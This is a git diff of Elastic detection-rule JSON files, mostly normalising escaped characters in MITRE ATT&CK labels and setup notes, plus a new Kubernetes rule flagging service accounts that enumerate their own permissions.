@@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json index f16193a875b..f7f7fd5610c 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json index d61e65796a9..53916906c5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json index fc9c7f63198..a240932971d 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json index a26f68d84c7..70d6cbbdb2e 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json index 51fe1ad5d7c..afc7a878d84 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json index 0bfc8600ac0..9c657b37c11 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json index 68e7fd3e07c..c400742223d 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json index dcc47ae8079..643bb696536 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json index 6fee719af3a..79e1a762a76 100644 --- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json index dcd0cb62612..892e59bd2ee 100644 --- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json +++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json index 215dd753e61..228f70ab1af 100644 --- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json +++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json index 7de06d92781..3368531526a 100644 --- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json +++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json index 6885bf5d2a9..10735731129 100644 --- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json +++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json index 27d71eee5e3..3692fa53ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json index 40190b54615..7115b86d410 100644 --- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json index 2acc756d57a..2cab838b694 100644 --- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json index e53b8199321..6e223f4cfd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json index 62a83dab4ef..315607a6177 100644 --- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json index 6071b0f7fe8..65fa17451c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json index 1802695d1df..85b3169d885 100644 --- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json +++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json index 45a44181f5d..ae797fa2092 100644 --- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json +++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json new file mode 100644 index 00000000000..7271452ec7b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.", + "false_positives": [ + "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Suspicious Self-Subject Review", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\")\n and (kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*))\n", + "references": [ + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms", + "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.impersonatedUser.username", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.user.username", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1613", + "name": "Container and Resource Discovery", + "reference": "https://attack.mitre.org/techniques/T1613/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "12a2f15d-597e-4334-88ff-38a02cb1330b_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json index 959528675fc..e9ad1b27d3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json +++ b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json index dc8a147da3d..af627797337 100644 --- a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json +++ 